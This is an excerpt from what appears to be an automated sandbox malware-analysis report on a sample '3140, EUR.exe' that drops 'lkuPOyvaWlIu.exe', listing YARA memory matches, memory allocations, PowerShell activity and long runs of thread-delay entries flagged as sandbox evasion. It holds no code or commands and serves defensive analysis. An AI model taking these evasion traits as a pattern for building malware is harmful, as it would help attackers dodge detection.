                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Source: Yara matchFile source: Process Memory Space: 3140, EUR.exe PID: 6844, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: lkuPOyvaWlIu.exe PID: 7276, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\3140, EUR.exeMemory allocated: AF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeMemory allocated: 2800000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeMemory allocated: 4800000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeMemory allocated: 7860000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeMemory allocated: 8860000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeMemory allocated: 8A20000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeMemory allocated: 9A20000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeMemory allocated: A060000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeMemory allocated: B060000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeMemory allocated: C060000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeMemory allocated: 2DD0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeMemory allocated: 3010000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeMemory allocated: 2E50000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeMemory allocated: C30000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeMemory allocated: 29F0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeMemory allocated: 2860000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeMemory allocated: 7780000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeMemory allocated: 8780000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeMemory allocated: 8930000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeMemory allocated: 9930000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeMemory allocated: 9C80000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeMemory allocated: AC80000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeMemory allocated: 30A0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeMemory allocated: 3200000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeMemory allocated: 5200000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 599766Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 599547Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 599437Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 599328Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 599219Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 599109Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 599000Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 598890Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 598781Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 598672Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 598562Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 598453Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 598344Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 598234Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 598125Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 598007Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 597906Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 597786Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 597672Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 597560Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 597334Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 597212Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 597045Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 596937Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 596828Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 596717Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 596609Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 596500Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 596391Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 596266Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 596141Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 596031Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 595922Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 595812Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 595703Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 595594Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 595484Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 595375Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 595266Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 595141Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 595016Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 594865Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 594484Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 594180Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 594061Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 593953Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 593844Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 593734Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 593625Jump to behavior
                    Source: C:\Users\user\Desktop\3140, EUR.exeThread delayed: delay time: 593502Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 600000
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 599828
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 599560
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 599432
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 599174
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 599047
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 598937
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 598828
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 598718
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 598609
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 598500
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 598387
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 598266
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 598156
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 598047
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 597937
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 597828
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 597719
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 597594
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 597484
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 597375
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 597265
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 597156
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 597047
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 596937
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 596828
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 596719
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 596609
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 596500
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 596390
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 596281
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 596172
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 596062
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 595953
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 595844
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 595734
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 595625
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 595515
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 595406
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 595294
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 595174
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 595058
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 594937
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 594828
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 594719
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 594609
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 594500
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeThread delayed: delay time: 594391
